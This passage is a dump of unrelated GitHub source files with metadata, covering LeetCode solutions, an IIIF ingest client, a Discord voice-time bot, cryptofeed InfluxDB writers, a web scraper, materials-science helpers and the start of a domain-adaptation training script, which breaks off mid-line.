+{"seq_id":"19200050292","text":"# check if list is a mountain array\n# Leetcode, arrays 101\n\n# so many exceptions....\n\nclass Solution:\n def validMountainArray(self, arr: list) -> bool:\n mountain = False\n peak = 0\n\n for i in range(1, len(arr) - 1):\n if arr[i] == arr[i - 1]:\n return False\n\n if arr[i] < arr[i - 1] and arr[i] <= arr[i + 1]:\n peak += 1\n if arr[i] > arr[i - 1] and arr[i] >= arr[i + 1]:\n peak += 1\n\n if peak >= 1 and arr[i] <= arr[i + 1]:\n return False\n\n if peak == 1:\n mountain = True\n\n return mountain\n\nif __name__ == \"__main__\":\n test_arr = [1,1,1,1,1,1,1,2,1]\n\n test_obj = Solution()\n print(test_obj.validMountainArray(test_arr))\n","repo_name":"karanpolobotu/PythonCatchup","sub_path":"Python3code/02-2022/feb19.py","file_name":"feb19.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"16643955804","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport boto3\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.join(ROOT_DIR, 'src'))\n\n\nfrom IIIFingest.auth import Credentials # noqa: E402\nfrom IIIFingest.client import Client # noqa: E402\n\n\ndef test_ingest_pipeline(args) -> None:\n\n # Logging configuration\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n pkg = logging.getLogger('IIIFingest')\n pkg.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Client configuration\n asset_prefix = args.asset_prefix\n issuer = args.issuer\n space = args.space\n environment = args.environment\n session = boto3.Session(profile_name=f\"mps-{space}-{environment}\")\n\n jwt_creds = Credentials(\n issuer=issuer,\n kid=f\"{issuer}default\",\n private_key_path=os.path.join(\n ROOT_DIR, f\"auth/{environment}/keys/{issuer}/{issuer}default/private.key\"\n ),\n )\n\n client = Client(\n space=space,\n environment=environment,\n asset_prefix=asset_prefix,\n jwt_creds=jwt_creds,\n boto_session=session,\n )\n\n images = [\n {\n \"label\": \"27.586.126A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest1.tif\"),\n },\n {\n \"label\": \"27.586.248A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest2.tif\"),\n \"metadata\": [{\"label\": \"Test\", \"value\": \"Image level metadata\"}],\n },\n {\n \"label\": \"27.586.249A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest3.tif\"),\n },\n ]\n\n manifest_level_metadata = {\n \"labels\": [\"Test Manifest MCIH\"],\n \"metadata\": [\n {\n \"label\": \"Creator\",\n \"value\": \"Unknown\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n {\n \"label\": \"Date\",\n \"value\": \"19th Century\",\n \"label_lang\": \"en\",\n \"value_lang\": \"en\",\n },\n ],\n \"required_statement\": [{\"label\": \"Attribution\", \"value\": \"Jinah Kim\"}],\n \"default_lang\": \"en\",\n \"service_type\": \"ImageService2\",\n \"service_profile\": \"level2\",\n \"rights\": \"http://creativecommons.org/licenses/by-sa/3.0/\",\n \"summary\": \"A test manifest for Mapping Color in History ingest into MPS IIIF delivery solution\",\n \"providers\": [\n {\n \"labels\": [\n {\n \"lang\": \"en\",\n \"value\": \"Harvard University - Arts and Humanities Research Computing (organizing org)\",\n }\n ],\n \"id\": \"http://id.loc.gov/authorities/names/n78096930\",\n },\n {\n \"labels\": [{\"value\": \"Harvard Art Museum (providing org)\"}],\n \"id\": \"http://id.loc.gov/authorities/names/no2008065752\",\n },\n ],\n }\n\n assets = client.upload(images=images, s3_path=\"images/\")\n\n manifest = client.create_manifest(\n manifest_level_metadata=manifest_level_metadata,\n assets=assets,\n )\n\n result = client.ingest(\n assets=assets,\n manifest=manifest,\n )\n\n status = client.jobstatus(result[\"job_id\"])\n print(\"Done: \", status)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--issuer\", \"-i\", help=\"set issuer\", default=\"atdarth\")\n parser.add_argument(\"--space\", \"-s\", help=\"set space\", default=\"atdarth\")\n parser.add_argument(\"--environment\", \"-e\", help=\"set environment\", default=\"qa\")\n parser.add_argument(\"--asset-prefix\", \"-a\", help=\"set asset prefix\", default=\"\")\n args = parser.parse_args()\n test_ingest_pipeline(args)\n","repo_name":"martimpassos/iiif-ingest-service","sub_path":"tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"43350948211","text":"from flask import Flask\nfrom parse import Parser\nfrom vectorizer import Vect\n\napp = Flask(__name__)\nparsewiki = Parser(\"../data/WestburyLab.Wikipedia.Corpus.txt\")\n\nvectorCreator = Vect()\n\"\"\"\nUncomment the next line for:\n- Parse Baseline Benchmark\n- Sequential Search Baseline Benchmark\n\"\"\"\n#parsewiki.parse()\n#parsewiki.vanillaQuery(\"Debargha\")\n\n\"\"\"\nUncommment the next line to build a search index\nIndex will be built in SQLite3 for a full text search\n\"\"\"\n#parsewiki.buildIndex()\n\n@app.route('/query/')\ndef query(querystring):\n \"\"\"\n - Use words in search query that are not stopwords\n - Replace those words with synonyms\n - Replace those words with the Word2Vec embeddings\n - Replace those words with the BERT embeddings\n - Replace those words with the AlBERT embeddings\n - Use the augmented strings to run the search\n \"\"\"\n\n closest = []\n try:\n closest = vectorCreator.closest_three(querystring)\n except:\n print(\"Word not in vocabulary\")\n\n\n return(parsewiki.queryIndex(\"{}\".format(querystring)))\n\n#parsewiki.queryIndex(\"Capitalism is terrible\")\n#parsewiki.queryIndex(\"Heart attack symptoms\")\n#parsewiki.queryTableBM25(\"Capitalism is terrible\")\n#parsewiki.queryTableHighlight(\"Sugar\")\n","repo_name":"DebarghaG/Semoogle","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38981193847","text":"import csv\nimport numpy as np\n\ndef parse_horizon(infile):\n \"\"\"\n Reads a horizon file output from openDetect. Contains inline, xline,\n and offsets\n \"\"\"\n \n ils, xls, values = ([],[],[])\n with open(infile, 'r') as f:\n reader=csv.reader(f, delimiter='\\t')\n for il, xl,z, zero, five, ten, ft, twen, tf, t, tf in reader:\n ils.append(int(il)-1)\n xls.append(int(xl)-1)\n point = [float(i) for i in[zero, five, ten, ft, twen, tf, t, tf]]\n values.append(point)\n \n value_array = np.array(values)\n inlines = np.array(ils)\n xlines = np.array(xls)\n horizons = np.zeros((np.amax(inlines)-np.amin(inlines) +1, \n np.amax(xlines) - np.amin(xlines)+1, value_array.shape[1]))\n horizons[inlines-np.amin(inlines), xlines - np.amin(xlines), :] += values\n \n return horizons\n\ndef horizon_norm(horizon):\n \"\"\"\n Normalize a horizon to unit energy across the offset dimension. Filters out\n zero energy and offset curves with NaNs.\n \"\"\"\n \n normed = np.nan_to_num(horizon / np.sqrt(np.sum(horizon**2, 2))[:,:, np.newaxis])\n normed = normed.reshape(normed.shape[0]*normed.shape[1], normed.shape[2])\n \n normed = normed[np.sum(normed,1) > 0]\n \n return normed\n","repo_name":"ben-bougher/admm_opt","sub_path":"horizon_parse.py","file_name":"horizon_parse.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"70114448041","text":"# \r\n# Given an array nums and a value val, remove all instances of that value in-place and return the new length.\r\n# \r\n# Do not allocate extra space for another array, you must do this by modifying the input array in-place with O(1) extra memory.\r\n# \r\n# The order of elements can be changed. It doesn't matter what you leave beyond the new length.\r\n# \r\n\r\nfrom typing import List\r\nimport pdb\r\n\r\nsolution_json = {\r\n \"date\": \"2021/3/24\",\r\n \"runtime\": \"36 ms\",\r\n \"memory\": \"14.1 MB\"\r\n}\r\n\r\nclass Solution:\r\n def removeElement(self, nums: List[int], val: int) -> int:\r\n idx = 0\r\n for i in range(len(nums)):\r\n line = ''\r\n line += 'nums[%d] = %d, ' % (i, nums[i])\r\n if nums[i] != val:\r\n nums[idx] = nums[i]\r\n line += 'nums[%d] = %d, ' % (idx, nums[idx])\r\n idx += 1\r\n #print(line)\r\n return idx\r\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_04_fun_with_arrays/solutions/0027-rm-element-s1.py","file_name":"0027-rm-element-s1.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"6306245286","text":"from troposphere import Output, Ref, Template\nfrom troposphere.s3 import Bucket, PublicRead\n\nt = Template(\"Create multiple S3 Bucket for XKE\")\nt.set_version()\n\nfor i in range(1, 10):\n s3_bucket = t.add_resource(Bucket(\"TestBucket\" + str(i),\n BucketName=\"xke-test-bucket-\" + str(i),\n AccessControl=PublicRead))\n t.add_output(Output(\n \"BucketName\" + str(i),\n Value=Ref(s3_bucket),\n Description=\"Name of S3 bucket\"\n ))\n\nprint(t.to_json())\n","repo_name":"fdebuire/cloudformation-troposhere-xke","sub_path":"2-troposphere/S3_multiple_bucket.py","file_name":"S3_multiple_bucket.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"37042588954","text":"import os\n\npath = '/home/lowpaw/Downloads/telegram-bibtexbot/notes'\nnotes_list = os.listdir(path)\nnotes_list.sort()\n\ncontents = []\n\nfor note_name in notes_list:\n fo = open(path + '/' + note_name, 'r')\n contents.append(fo.read())\n fo.close()\n\ncontents = '\\n\\n'.join(contents)\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.md', \"w\")\nfo.write(contents)\nfo.close()\n\n# html is generated with:\n# https://www.makeuseof.com/md-block-render-markdown-web-page/\n\nnotes_html = ['''\n\n\n\n\n\n\n\n\n''','''\n\n\n\n\n\n'''\n]\n\nfo = open('/home/lowpaw/Downloads/telegram-bibtexbot/notes.html', \"w\")\nfo.write(contents.join(notes_html))\nfo.close()\n","repo_name":"lapamatoz/telegram-bibtexbot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"3637200461","text":"#!python3\n\nimport asyncio\nimport datetime\nimport discord\nimport json\nfrom sqlalchemy import Column, DateTime, Interval, Boolean, String\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm.exc import NoResultFound\nimport sys\n\n# Database setup\nBase = declarative_base()\n\nclass Member(Base):\n __tablename__ = 'members'\n id = Column(String, primary_key=True)\n name = Column(String)\n last_join = Column(DateTime)\n total_time = Column(Interval)\n in_chat = Column(Boolean)\n\n def update_total_time(self):\n \"\"\"Update total_time with time since last_join\"\"\"\n now = datetime.datetime.now()\n self.total_time += now - self.last_join\n self.last_join = now\n\nengine = create_engine('sqlite:///member_tracker.sqlite')\nsession = sessionmaker()\nsession.configure(bind=engine)\nBase.metadata.create_all(engine)\n\n# Discord client\nclient = discord.Client()\n\n# Helpers\ndef update_active_users():\n \"\"\"Updates total_time for all active users\"\"\"\n s = session()\n for channel in client.get_all_channels():\n for member in channel.voice_members:\n if not member.voice.is_afk:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n dbmember.in_chat = True\n dbmember.update_total_time()\n except NoResultFound:\n dbmember = Member(\n id=member.id,\n name=member.nick if member.nick else member.name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=True\n )\n s.add(dbmember)\n s.commit()\n\ndef check_admin(message):\n \"\"\"Checks if the message is from an administrator\"\"\"\n perms = message.channel.permissions_for(message.author)\n is_admin = perms.administrator\n try:\n for role in message.author.roles:\n if \"Admins\" in role.name or \"Founder\" in role.name:\n is_admin = True\n break\n except AttributeError:\n # Bypass for redkrieg to work in private messages\n if str(message.author.id) == \"135195179219943424\":\n is_admin = True\n return is_admin\n\ndef format_timedelta(td):\n \"\"\"Formats timedelta without microseconds\"\"\"\n # Modified from stdlib datetime.timedelta.__str__\n mm, ss = divmod(td.seconds, 60)\n hh, mm = divmod(mm, 60)\n s = \"%d:%02d:%02d\" % (hh, mm, ss)\n if td.days:\n def plural(n):\n return n, abs(n) != 1 and \"s\" or \"\"\n s = (\"%d day%s, \" % plural(td.days)) + s\n return s\n\n\n# Background events\nasync def active_user_update_loop():\n \"\"\"Reset join times, wait for discord connection, then keep db synced\"\"\"\n s = session()\n members = s.query(Member).all()\n now = datetime.datetime.now()\n for member in members:\n member.in_chat = False\n member.last_join = now\n s.commit()\n await client.wait_until_ready()\n while not client.is_closed:\n update_active_users()\n await asyncio.sleep(60)\n\n# Discord events\n@client.event\nasync def on_voice_state_update(before, after):\n \"\"\"Monitor status updates for voice channels\"\"\"\n s = session()\n # prefer nickname in server to actual discord username\n member_name = before.nick if before.nick else before.name\n try:\n member = s.query(Member).filter(Member.id == before.id).one()\n # update member names on each channel join\n member.name = member_name\n except NoResultFound:\n member = Member(\n id=before.id,\n name=member_name,\n last_join=datetime.datetime.now(),\n total_time=datetime.timedelta(0),\n in_chat=False\n )\n s.add(member)\n if after.voice.voice_channel is None:\n if member.in_chat:\n member.in_chat = False\n member.update_total_time()\n try:\n channel_name = before.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Unknown\"\n print(\"{} left voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n else:\n if member.in_chat:\n # Don't consider deafened or afk users as active\n if after.voice.is_afk or after.voice.self_deaf or after.voice.deaf:\n # This logic breaks if the user is server deafened and\n # self-deafens as well. Need to think through.\n member.in_chat = False\n member.update_total_time()\n else:\n member.in_chat = True\n member.last_join = datetime.datetime.now()\n try:\n channel_name = after.voice.voice_channel.name\n except AttributeError:\n channel_name = \"Private\"\n print(\"{} joined voice channel {}. Total time: {}\".format(\n member.name,\n channel_name,\n member.total_time\n ))\n s.commit()\n sys.stdout.flush()\n\n@client.event\nasync def on_message(message):\n \"\"\"Handles incoming messages\"\"\"\n if message.author == client.user:\n return\n\n if not check_admin(message):\n return\n\n if message.content.startswith('!velocistats'):\n s = session()\n if len(message.mentions) > 0:\n for member in message.mentions:\n try:\n dbmember = s.query(Member).filter(\n Member.id == member.id\n ).one()\n except NoResultFound:\n await client.send_message(\n message.channel,\n \"User {} not found!\".format(\n member.nick if member.nick else member.name\n )\n )\n continue\n if dbmember.in_chat:\n dbmember.update_total_time()\n s.commit()\n await client.send_message(\n message.channel,\n \"User {0} has a total chat time of {1}\".format(\n dbmember.name,\n format_timedelta(dbmember.total_time)\n )\n )\n elif message.content.startswith('!velocistats low'):\n members = s.query(Member).order_by(\n Member.total_time.asc()\n ).filter(\n Member.name.startswith('-=[ V ]=-')\n ).limit(10).all()\n msg = [ \"\"\"Current Lowest Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n else:\n members = s.query(Member).order_by(\n Member.total_time.desc()\n ).limit(10).all()\n msg = [ \"\"\"Current Top Voice Users\\n\\n```\"\"\" ]\n for member in members:\n if member.in_chat:\n member.update_total_time()\n msg.append(\n \"{0: <40}{1: >25}\\n\".format(\n member.name,\n format_timedelta(member.total_time)\n )\n )\n msg.append(\"\"\"```\"\"\")\n s.commit()\n await client.send_message(\n message.channel,\n ''.join(msg)\n )\n\n@client.event\nasync def on_ready():\n \"\"\"Print out some status info on connect\"\"\"\n print('Logged in as')\n print(client.user.name)\n print(client.user.id)\n print('------')\n sys.stdout.flush()\n\n# Configuration\nwith open('token.json') as f:\n token = json.load(f)['token']\n \n# Run it\nclient.loop.create_task(active_user_update_loop())\nclient.run(token)\n","repo_name":"RedKrieg/velocibot","sub_path":"velocibot.py","file_name":"velocibot.py","file_ext":"py","file_size_in_byte":8339,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"}
+{"seq_id":"20306377355","text":"\ndef move_x(location_x):\n \n \n # center x pixel\n center_x = 424\n\n # find difference between center and object, postive number means to the right\n diff_x = location_x - center_x\n\n #if object is to the right\n if (diff_x > 300):\n return 1\n\n elif (diff_x > 200):\n return 2\n\n elif (diff_x > 100):\n return 3\n\n elif (diff_x > 10):\n return 4\n\n #if object is to the left \n elif (diff_x < -300):\n return -1\n \n elif (diff_x < -200):\n return -2\n \n elif (diff_x < -100):\n return -3\n \n elif (diff_x < -10):\n return -4\n\n #if object is in neither then do nothing so return 0\n else:\n return 200\n\n# find direction to turn motor\ndef find_direction(data):\n direction = 0\n if (data > 0):\n direction = 0\n else:\n direction = 1\n direction = \"setDirection:\" + str(direction)\n return direction\n \n# calculate angle to send to motors\ndef calc_angle(data):\n angle = 0\n diff = abs(data)\n\n if diff == 1:\n angle = 30\n elif diff == 2:\n angle = 20\n elif diff == 3:\n angle = 10\n elif diff == 4:\n angle = 3\n else:\n angle = 0\n\n angle = \"moveMotor:\" + str(angle)\n return angle\n\n\n\n\n\ndef move_y(location_y):\n \n # center x pixel\n center_y = 240\n\n # find difference between center and object, postive number means to the right\n diff_y = location_y - center_y\n\n #if object is to the below\n if (diff_y > -200):\n return 1\n\n elif (diff_y > -100):\n return 2\n\n #if object is to the above \n elif (diff_y < 200):\n return -1\n \n elif (diff_y < 100):\n return -2\n\n #if object is in neither then do nothing so return 0\n else:\n return 200","repo_name":"ClaytonWilson12/nerf","sub_path":"scripts/servo_instruction.py","file_name":"servo_instruction.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"40636754268","text":"#Библиотека c эмодзи\nfrom emoji import emojize\n#Импорт settings.py для сокрытия токенов, паролей и личных данных\nimport settings\n#Модуль random отвечает за работу со случайными числами, функция randint - за целые числа; choice - за выбор случайного элемента\nfrom random import randint, choice\n#Класс для создания клавиатур\nfrom telegram import ReplyKeyboardMarkup, KeyboardButton\n\n\n#Функция получения смайлика\ndef get_smile(user_data):\n if 'emoji' not in user_data:\n smile = choice(settings.USER_EMOJI)\n return emojize(smile, language='alias')# smile(текст) преобразуем в иконку смайлика, language='alias'(текстовые обозначения смайликов)\n return user_data['emoji']\n\n\n#Функция вывода результата, для игры в числа\ndef play_random_numbers(user_number):\n bot_number = randint(user_number - 10, user_number + 10)\n if user_number > bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ты выиграл'\n elif user_number == bot_number:\n message = f'Твое число {user_number}, мое {bot_number}, ничья'\n else:\n message = f'Твое число {user_number}, мое {bot_number}, ты проиграл'\n return message\n\n\n#Функция отправки случайной картинки при нажатии кнопки Прислать котика и отправки геолокации(работает с мобилы)\ndef main_keyboard():\n return ReplyKeyboardMarkup([\n ['Прислать котика', KeyboardButton('Мои координаты', request_location=True)]\n ])\n","repo_name":"Comandosss/mybot","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"73417863080","text":"import requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nimport lxml.etree\nimport time\nimport random\n#urls = \"https://www.meituri.com/s/%d/\"%index\n\ndef getTree(url):\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\n try:\n r=requests.get(url, timeout=5,headers = headers, verify = False)\n r.raise_for_status()\n r.encoding=r.apparent_encoding\n tree=lxml.etree.HTML(r.text)\n return tree\n except Exception as e:\n raise Exception(\"404\",e)\n return None\nindex = 1\nwhile True:\n urlx = \"https://www.meituri.com/x/%d/\"%index\n try:\n tree=getTree(urlx)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n detail=detail.replace(\"\\n\",\" \")\n print(index,urlx,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(1,3))\n\nprint(\"++++++++++++++\")\nindex = 9\nwhile True:\n urls = \"https://www.meituri.com/s/%d/\"%index\n try:\n tree=getTree(urls)\n content=tree.xpath(\"//div[@class='fenlei']\")[0]\n title=content.xpath(\"h1\")[0].xpath(\"string(.)\")\n detail=content.xpath(\"p\")[0].xpath(\"string(.)\")\n print(index,urls,title,detail,sep=\"@\",end=\"\\n\")\n except Exception as e:\n print(e)\n break\n index+=1\n time.sleep(random.randint(2,4))\n\n\"\"\"\nurl = \"https://www.meituri.com/x/1/\"\nheaders = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36\",\"Host\": \"www.meituri.com\"}\nr=requests.get(url, timeout=5,headers = headers, verify = False)\nprint(r.status_code)\nprint(len(r.text))\"\"\"","repo_name":"crj1998/meitu","sub_path":"meituAPI.py","file_name":"meituAPI.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"38014986121","text":"from ase.build import mx2\nfrom ase import Atoms\nfrom ase.io import read, write\nfrom ase.calculators.espresso import Espresso\nimport math\n\ndef monolayer_MX2(formula, a, thickness,vacuum):\n crystal=mx2(formula=formula, kind='2H', a=a, thickness=thickness, size=(1,1,1), vacuum=None)\n #print(crystal.positions)\n #convert to all PBC cell\n slab=Atoms(crystal)\n slab.set_cell([crystal.cell[0],crystal.cell[1],[0.0,0.0,vacuum]], scale_atoms=False)\n slab.set_pbc([True, True, True])\n return slab\n\ndef monolayer_Xene(formula, a, buckling, vacuum):\n if vacuum is not None:\n buckling=buckling/vacuum\n\n positions=[[2/3, 1/3,buckling/2.0],[1/3,2/3,-buckling/2.0]]\n cell=[[a, 0, 0], [-a/2, a * 3**0.5 / 2, 0], [0, 0, 0]]\n atoms = Atoms(formula, positions=positions, cell=cell, pbc=(1, 1, 0))\n atoms.set_scaled_positions(positions)\n if vacuum is not None:\n atoms.center(vacuum, axis=2)\n return atoms\n\n\n\n\n","repo_name":"eminamitani/layeredMaterialToolKit","sub_path":"layeredMaterialToolKit/monolayer.py","file_name":"monolayer.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"11669658912","text":"from decimal import Decimal\nimport logging\nimport requests\n\nfrom cryptofeed.defines import BID, ASK\nfrom cryptofeed.backends._util import book_convert, book_delta_convert\nfrom cryptofeed.backends.http import HTTPCallback\nfrom cryptofeed.exceptions import UnsupportedType\n\n\nLOG = logging.getLogger('feedhandler')\n\n\nclass InfluxCallback(HTTPCallback):\n def __init__(self, addr: str, db: str, create_db=True, numeric_type=str, **kwargs):\n \"\"\"\n Parent class for InfluxDB callbacks\n\n influxDB schema\n ---------------\n MEASUREMENT | TAGS | FIELDS\n\n Measurement: Data Feed-Exxhange (configurable)\n TAGS: pair\n FIELDS: timestamp, amount, price, other funding specific fields\n\n Example data in InfluxDB\n ------------------------\n > select * from COINBASE-book;\n name: COINBASE\n time amount pair price side timestamp\n ---- ------ ---- ----- ---- ---------\n 1542577584985404000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:24.963762Z\n 1542577584985404000 0.0015 BTC-USD 5542 ask 2018-11-18T21:46:24.963762Z\n 1542577585259616000 0.0018 BTC-USD 5536.17 bid 2018-11-18T21:46:25.256391Z\n\n Parameters\n ----------\n addr: str\n Address for connection. Should be in the format:\n http(s)://:port\n db: str\n Database to write to\n numeric_type: str/float\n Convert types before writing (amount and price)\n \"\"\"\n super().__init__(addr, **kwargs)\n self.addr = f\"{addr}/write?db={db}\"\n self.session = None\n self.numeric_type = numeric_type\n\n if create_db:\n r = requests.post(f'{addr}/query', data={'q': f'CREATE DATABASE {db}'})\n r.raise_for_status()\n\nclass TradeInflux(InfluxCallback):\n def __init__(self, *args, key='trades', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed: str, pair: str, side: str, amount: Decimal, price: Decimal, order_id=None, timestamp=None):\n amount = str(amount)\n price = str(price)\n\n if order_id is None:\n order_id = 'None'\n if self.numeric_type is str:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount=\"{amount}\",price=\"{price}\",timestamp={timestamp}'\n elif self.numeric_type is float:\n trade = f'{self.key}-{feed},pair={pair} side=\"{side}\",id=\"{order_id}\",amount={amount},price={price},timestamp={timestamp}'\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n\n await self.write('POST', trade)\n\n\nclass FundingInflux(InfluxCallback):\n def __init__(self, *args, key='funding', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, **kwargs):\n data = f\"{self.key}-{feed},pair={pair} \"\n\n for key, val in kwargs.items():\n if key in {'feed', 'pair'}:\n continue\n if isinstance(val, (Decimal, float)):\n val = str(val)\n if self.numeric_type is str:\n val = f'\"{val}\"'\n elif self.numeric_type is not float:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n elif isinstance(val, str):\n val = f'\"{val}\"'\n data += f\"{key}={val},\"\n\n data = data[:-1]\n await self.write('POST', data)\n\n\nclass InfluxBookCallback(InfluxCallback):\n async def _write_rows(self, start, data, timestamp):\n msg = []\n ts = int(timestamp * 1000000000)\n for side in (BID, ASK):\n for price, val in data[side].items():\n if isinstance(val, dict):\n for order_id, amount in val.items():\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price=\"{price}\",amount=\"{amount}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",id=\"{order_id}\",timestamp={timestamp},price={price},amount={amount} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n else:\n if self.numeric_type is str:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price=\"{price}\",amount=\"{val}\" {ts}')\n elif self.numeric_type is float:\n msg.append(f'{start} side=\"{side}\",timestamp={timestamp},price={price},amount={val} {ts}')\n else:\n raise UnsupportedType(f\"Type {self.numeric_type} not supported\")\n ts += 1\n await self.write('POST', '\\n'.join(msg))\n\n\nclass BookInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', depth=None, **kwargs):\n super().__init__(*args, **kwargs)\n self.depth = depth\n self.key = key\n self.previous = {BID: {}, ASK: {}}\n\n async def __call__(self, *, feed, pair, book, timestamp):\n data = {BID: {}, ASK: {}}\n book_convert(book, data, self.depth)\n\n if self.depth:\n if data[BID] == self.previous[BID] and data[ASK] == self.previous[ASK]:\n return\n self.previous[ASK] = data[ASK]\n self.previous[BID] = data[BID]\n\n start = f\"{self.key}-{feed},pair={pair},delta=False\"\n await self._write_rows(start, data, timestamp)\n\n\nclass BookDeltaInflux(InfluxBookCallback):\n def __init__(self, *args, key='book', **kwargs):\n super().__init__(*args, **kwargs)\n self.key = key\n\n async def __call__(self, *, feed, pair, delta, timestamp):\n start = f\"{self.key}-{feed},pair={pair},delta=True\"\n data = {BID: {}, ASK: {}}\n book_delta_convert(delta, data)\n await self._write_rows(start, data, timestamp)\n","repo_name":"glgnohk/cryptofeed","sub_path":"cryptofeed/backends/influxdb.py","file_name":"influxdb.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"18"}
+{"seq_id":"24335313925","text":"from __future__ import print_function\r\nimport argparse\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms\r\nfrom torch.autograd import Variable\r\nimport os\r\nimport numpy as np\r\nfrom dann_model import DANN_Neural_Network\r\nfrom dann_data import MNIST, SVHN\r\n\r\n\r\n# Training settings\r\nparser = argparse.ArgumentParser(description='PyTorch MNIST Example')\r\nparser.add_argument('--batch-size', type=int, default=64, metavar='N',\r\n help='input batch size for training (default: 64)')\r\nparser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\r\n help='input batch size for testing (default: 1000)')\r\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\r\n help='number of epochs to train (default: 10)')\r\nparser.add_argument('--lr', type=float, default=0.01, metavar='LR',\r\n help='learning rate (default: 0.01)')\r\nparser.add_argument('--momentum', type=float, default=0.5, metavar='M',\r\n help='SGD momentum (default: 0.5)')\r\nparser.add_argument('--no-cuda', action='store_true', default=False,\r\n help='disables CUDA training')\r\nparser.add_argument('--seed', type=int, default=1, metavar='S',\r\n help='random seed (default: 1)')\r\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\r\n help='how many batches to wait before logging training status')\r\nparser.add_argument('--save_dir', type=str, default='./train',\r\n help=\"the path to save the trained model\")\r\nargs = 